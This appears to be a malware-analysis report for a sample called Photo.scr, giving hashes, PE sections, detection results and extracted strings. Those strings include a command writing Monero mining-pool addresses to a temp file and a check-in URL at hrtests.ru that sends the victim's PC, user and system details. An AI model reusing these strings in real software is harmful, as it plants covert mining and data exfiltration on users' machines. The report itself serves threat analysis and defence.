Photo.scr

First submission 2024-06-27 13:02:05 Last submission 2024-10-06 19:37:26

File details

File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Mime type: application/x-dosexec
File size: 1541.5 KB (1578496 bytes)
Compile time: 2016-02-06 22:24:54
MD5: aba2d86ed17f587eb6d57e6c75f64f05
SHA1: aeccba64f4dd19033ac2226b4445faac05c88b76
SHA256: 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d
Import Hash: 87e83bda436138fd7844ecd76decc70d
Sections 9 .text .data .rdata .eh_fram .bss .idata .CRT .tls .rsrc
Directories 3 import resource tls

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 70/78 VT report date: 2024-06-26 01:38:44
Malware Type 3 miner trojan worm
Threat Type 3 agentb crytes btdr

URLs, FQDN and IP indicators 30


PE Sections 4 suspicious

Name VAddress VSize Size SHA1 MD5 Suspicious
.text 0x1000 0x137d0 79872 e4f3b05c2cb72a3a9bb4e5bacd63788c2b5490c5 39157f6164a3e966d93a9e54bfd55e5d
.data 0x15000 0x464 1536 256e5fd77471c28593995ca3c04c6bd381484a7e 4fc8adf7c869a3dc80426fcded1e27c6
.rdata 0x16000 0x2814 10752 404f81af522150235967c7ea3605dc7ec5deff1d 01869b2ba05653efc7e6e179ffc28524
.eh_fram 0x19000 0x3f8 1024 38077d7eac73791ed56a875f762607f420a30eea a5fe82dca0728310905bb6a8e4d0bc89
.bss 0x1a000 0x4b4c 0 da39a3ee5e6b4b0d3255bfef95601890afd80709 d41d8cd98f00b204e9800998ecf8427e
.idata 0x1f000 0xd98 3584 851ac9544791955aa0578aca1df9a4d4611cedff e5e1e8c03c9fe706cebf7ad22484fd9c
.CRT 0x20000 0x1c 512 017fb7e9f533038de83933b0d5cb232b45bedb9b 9d082062f4e4e509453fecdae3c43c45
.tls 0x21000 0x20 512 997b5806a26eb53fe57011ba617d9de51785c1ee f8afb1bfec2ae1670831e201203150b4
.rsrc 0x22000 0x169230 1479680 7cdf9e1c2ee86aa3d95a06b23898cac34b5e4005 2a2c87b0b8e62eec304b57f76d5904de

PE Resources 3

Name Language Sublanguage Offset Size Data
RT_ICON LANG_ENGLISH SUBLANG_ENGLISH_US 0x2cd34 1128
RT_RCDATA LANG_ENGLISH SUBLANG_ENGLISH_US 0x2d19c 1433600
RT_GROUP_ICON LANG_ENGLISH SUBLANG_ENGLISH_US 0x18b19c 146

Anti debug functions 1

GetLastError

Strings analysis - File found

Text
/c (echo stratum+tcp://mine.moneropool.com:3333& echo stratum+tcp://monero.crypto-pool.fr:3333& echo stratum+tcp://xmr.prohash.net:7777& echo stratum+tcp://pool.minexmr.com:5555)> %TEMP%\pools.txt
Library
ADVAPI32.dll
SHELL32.dll
USER32.dll
WS2_32.dll
MSVCRT.dll
KERNEL32.dll
WININET.dll
libgcj-13.dll

Strings analysis - Possible URLs found 3

http://schemas.microsoft.com/SMI/2005/WindowsSettings
http://%s/test.html?%d
http://hrtests.ru/S.php?ver=24&pc=%s&user=%s&sys=%s&cmd=%s&startup=%s/%s

Import functions

Name Latest seen MD5
Photo.scr 2024-10-06 15:59:11 a550e30cbbd566d93f0b9211a4bd2434
Photo.scr 2024-10-06 19:10:12 1a832c16b6a7dfeb7a6f094ee6d22fc8
Photo.scr 2024-10-06 19:24:32 914fd13923879c49c66fbb775a16958b